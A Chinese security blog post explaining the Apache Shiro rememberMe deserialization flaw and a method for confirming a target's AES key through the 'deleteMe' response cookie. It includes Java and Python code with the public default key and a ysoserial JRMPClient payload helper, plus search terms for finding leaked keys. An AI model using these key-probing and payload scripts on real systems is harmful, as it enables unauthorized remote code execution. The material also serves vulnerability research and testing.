shiro漏洞原理以及检测key值原理

最新推荐文章于 2024-06-12 14:42:15 发布
最新推荐文章于 2024-06-12 14:42:15 发布
阅读量4.4k 收藏 6
点赞数 3
分类专栏: # java漏洞 文章标签: 安全 渗透测试 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/128930942
版权

一、shiro漏洞原理

  • Shiro 1.2.4及之前的版本中,AES加密的密钥默认硬编码在代码里(SHIRO-550),Shiro 1.2.4以上版本官方移除了代码中的默认密钥,要求开发者自己设置,如果开发者没有设置,则默认动态生成,降低了固定密钥泄漏的风险。

  • 升级shiro版本并不能根本解决反序列化漏洞,代码复用会直接导致项目密钥泄漏,从而造成反序列化漏洞。针对公开的密钥集合,我们可以在github上搜索到并加以利用。(搜索关键词:"securityManager.setRememberMeManager(rememberMeManager); Base64.decode(“或"setCipherKey(Base64.decode(”)

二、检测shiro反序列化漏洞的key值的方法

我们如何获知选择的密钥是否与目标匹配呢?有一种思路是:当密钥不正确或类型转换异常时,目标Response包含Set-Cookie:rememberMe=deleteMe字段,而当密钥正确且没有类型转换异常时,返回包不存在Set-Cookie:rememberMe=deleteMe字段。

那么具体的检测方法一般包括如下几种:

  • 第一种是利用URLDNS进行检测https://github.com/LuckyC4t/shiro-urldns/blob/master/src/main/java/luckycat/shirourldns/URLDNS.java

  • 第二种利用命令执行进行检测  通过执行ping命令来检测。

  • 第三种使用SimplePrincipalCollection序列化后进行检测(XCheck,即Xray Check)通过使用SimplePrincipalCollection序列化来进行检测,key正确情况下不返回 deleteMe ,key错误情况下返回 deleteMe

1.密钥不正确

  • Key不正确,解密时org.apache.shiro.crypto.JcaCipherService#crypt抛出异常

  • 进而走进org.apache.shiro.web.servlet.impleCookie#removeFrom方法,在返回包中添加了rememberMe=deleteMe字段

  • 于是获得的返回包包含了Set-Cookie:rememberMe=deleteMe字段。

2.类型转换异常

  • org.apache.shiro.mgt.AbstractRememberMeManager#deserialize进行数据反序列化,返回结果前有对反序列化结果对象做PrincipalCollection的强制类型转换。

  • 可以看到类型转换报错,因为我们的反序列化结果对象与PrincipalCollection并没有继承关系

  • 反序列化异常后同样捕捉到异常,填到报错异常中。

  • 紧接着也跳到了removeFrom中,添加响应头。

  • 然后看响应头也同样添加了rememberMe=deleteMe

3.检测方法(XCheck,即Xray Check)

如上分析,我么只需要构造一个类型继承了PrincipalCollection的类,这样在反序列化是转换为PrincipalCollection时就不会报错。通过实现关系查看,SimplePrincipalCollection和SimplePrincipalMap均符合要求。

  • 那么构造这两个对象对象中的其中一个进行序列化。

import org.apache.shiro.subject.SimplePrincipalCollection;

import org.apache.shiro.subject.SimplePrincipalMap;

import java.io.FileOutputStream;

import java.io.ObjectOutputStream;



public class SimplePrincipalCollectionTest {

    public static void main(String[] args) throws Exception {

        SimplePrincipalMap simplePrincipalMap = new SimplePrincipalMap();

//        SimplePrincipalCollection simplePrincipalCollection = new SimplePrincipalCollection();

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));

        oos.writeObject(simplePrincipalMap);

        oos.close();

    }

}

  • 将序列化号的文件用写好的脚本进行AES加密并且编码。

import sys

import base64

import uuid

from random import Random

import subprocess

from Crypto.Cipher import AES



def get_file_data(filename):

    with open(filename,'rb') as f:

        data = f.read()

    return data



def aes_enc(data):

    BS = AES.block_size

    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

    key  =  "kPH+bIxk5D2deZiIxcaaaA=="

    mode =  AES.MODE_CBC

    iv   =  uuid.uuid4().bytes

    encryptor = AES.new(base64.b64decode(key), mode, iv)

    ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))

    return ciphertext



def encode_rememberme(command):

    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)

    BS   = AES.block_size

    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

    key  =  "kPH+bIxk5D2deZiIxcaaaA=="

    mode =  AES.MODE_CBC

    iv   =  uuid.uuid4().bytes

    encryptor = AES.new(base64.b64decode(key), mode, iv)

    file_body = pad(popen.stdout.read())

    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

    return base64_ciphertext



if __name__ == '__main__':

    # test.bin为编译好的序列化链的内容

    data = get_file_data("test.bin")

    print(aes_enc(data))

  • 将编码好的payload通过rememberMe字段发送,如果密钥是正确的,则相应包中就不会存在rememberMe=deleteMe的响应头。

Thunderclap_
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
shiro key文件
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-01 1293
​下面结合实战以及shiro的CookieRememberMeManaer的调用过程,浅谈获取shiro key文件的几种方式。 shiro key文件的获取方式:1结合Dnslog与URLDNS;2利用时间延迟或报错;3结合CookieRememberMeManaer 1结合Dnslog与URLDNS 在进行漏洞探测的时候,一般会使用ysoserial-URLDNS-gadget结合dnslog进检测,其受JDK版本和相关的安全策略影响,除非存在网络限制DNS不能出网。 通过判断dnslog是否
Shiro反序列化漏洞检测工具
01-05
`ShiroExploit-Deprecated-2.51.zip`和`ShiroExploit.V2.51`是针对这个漏洞检测工具,可以帮助安全研究人员和系统管理员检查他们的Shiro环境是否受到了这个漏洞的影响。这些工具通常会模拟攻击者的操作,尝试通过...
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 https://github.com/feihong-cs/ShiroExploit_GUI/releases 反序列化漏洞是如何产生的? shiro版本<=1.2.4时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化漏洞的产生。(参考http://www.secwk.com/2019/09/18/2818/) 反序列化漏洞解决思路 从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级版本到1.2.6。大家有同样问题的可以选择试一下希望大家也能像我一样解决;
shiro漏洞检测工具
08-10
shiro漏洞检测工具,找了一个18M左右的不好用,经验证这个好用,不会报找不到类错误。
Shirokey但无回显利用链子-JRMP大法
最新发布
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-12 1069
shiro在手天下我有,扫出key直接梭哈getshell,横扫内网。但要是像这种情况,直接下班拜拜跑路,没有链子玩毛线…直到出现了这么一个工具可以通过JRMP协议探测是否存在漏洞,很显然上面工具是做不到的,实战中很可能因此丢掉一个shell。
shiro泄露key无依赖链利用技巧
渗透测试研究中心
12-26 1437
获取环境:拉取镜像到本地$ docker pull medicean/vulapps:s_shiro_1 启动环境$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11.使用shiro_attack_2.2工具对目标系统进行检查,发现有默认key但是无利用链2.使用shior_tools.jar 直接对目标系统进行检测检测完毕后会返回可执行...
aes key长度_原创 | 浅谈Shiro反序列化获取Key的几种方式
weixin_39946767的博客
11-22 637
点击“关注”了解更多信息关于Apache Shiro反序列化在shiro≤1.2.4版本,默认使⽤了CookieRememberMeManager,由于AES使用的key泄露,导致反序列化的cookie可控,从而引发反序列化攻击。(理论上只要AES加密钥泄露,都会导致反序列化漏洞)利用的两个关键条件是key和可用gadget。1.2.4版本默认key为kPH+bIxk5D2deZiIxc...
shiro反序列化生成KEY
m0_67392273的博客
08-24 396
Shiro反序列化时候的第一步需要猜KEY,此番操作就像遍历弱口令似的。
shiro反序列化漏洞原理和复现
热门推荐
LJH1999ZN的博客
03-31 1万+
一、shiro简介 Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。 二、shiro的身份认证工作流程 通过前端传入的, 获取rememberMe cookie base64加密 AES加密 (对称加解密) 反序列化 三、shiro反序列化漏洞原理 AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES
heapdump泄露Shiro key从而RCE
渗透测试研究中心
12-05 4439
1. 简介我搭建了一个Spring heapdump泄露shiro key从而RCE的漏洞环境,Github地址:https://github.com/P4r4d1se/heapdump_shiro_vuln漏洞利用条件:Spring Shiro环境存在heapdump文件泄露存在可利用链2. 漏洞原理Shiro相关的漏洞原理和调试分析已经有很多大佬分享过了,这里不再赘述,这里主要针对这个漏洞环...
Shiro框架漏洞
slismy的博客
09-12 5341
一、Shiro漏洞原理 Apache Shiro框架提供了记住我的功能(RemeberMe),用户登录成功后会生成经过加密并编码的cookie。 cookie的key为RemeberMe,cookie的是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的 在服务端接收cookie时,按以下步骤解析: 检索RemeberMe cookie的 Base 64解码 使用ACE解密(加密密钥硬编码) 进行反序列化操作(未作过滤处理) 在调用反序列化的时候未进行任何过滤,导致
Shiro使用官方方法生成密钥
m0_67391521的博客
03-28 1720
原文链接:这里,这里! 0.前言 平台漏洞扫描,扫描到一堆安全问题,其中有个关于Shiro的。主要是说如果项目中shiro key为默认密钥或者网络公开密钥,就可以轻易的导致远程代码执行。 本文框架SSM+shiro。 1.解决思路 (1)升级Shiro版本,为1.7.0以上 (2)自定义一个base 64 AES密钥 (3)使用官方生成的方法提供密钥 本文选择的是第三种办法: 我们在shrio新建一个类。参照下面的代码进行添加: import javax.crypto.KeyGenerator; impo
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
springboot读取shirokey命令执行
网络安全。
03-31 2046
0x1 简介 当springboot遇到shiro,一切变得合理了起来。 0x2 利用 存在springboot env页面 https://xxx/api/actuator/env 但未发现明文shirokey,如图这种的。 使用visualvm工具读取shiro字节类型key。 下载:https://visualvm.github.io/download.html(工具在/bin目录下) 导入heapdump,在过滤文件中搜索如下条件。 org.apache.shiro.web.mgt.Cooki
Shiro框架漏洞总结
zhuyi666的博客
03-23 7930
Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
shiro550反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
200个shiro_key
weixin_46137328的博客
03-18 4078
0AvVhmFLUs0KTA3Kprsdag== 1AvVhdsgUs0FSA3SDFAdag== 1QWLxg+NYmxraMoxAXu/Iw== 1tC/xrDYs8ey+sa3emt...
shiro-550 漏洞原理分析
06-06
Shiro-550漏洞是Apache Shiro框架的一种远程代码执行漏洞。Apache Shiro是一个开源的安全框架,用于认证、授权和加密等安全操作。该漏洞原理是由于Shiro框架在反序列化时存在漏洞,攻击者可以通过构造恶意的序列化数据包,触发远程代码执行漏洞,从而实现对目标系统的完全控制。 具体来说,当Shiro框架在反序列化过程中,会调用Java的ObjectInputStream类的readObject()方法,攻击者可以通过构造恶意的序列化数据包,使得该方法在反序列化时触发任意代码执行。攻击者可以通过此漏洞在目标服务器上执行任意命令,获取敏感信息等。 此漏洞对于使用了Shiro框架的Java应用程序来说是非常危险的。建议及时升级Shiro框架版本,或者关闭相关功能以避免此类漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值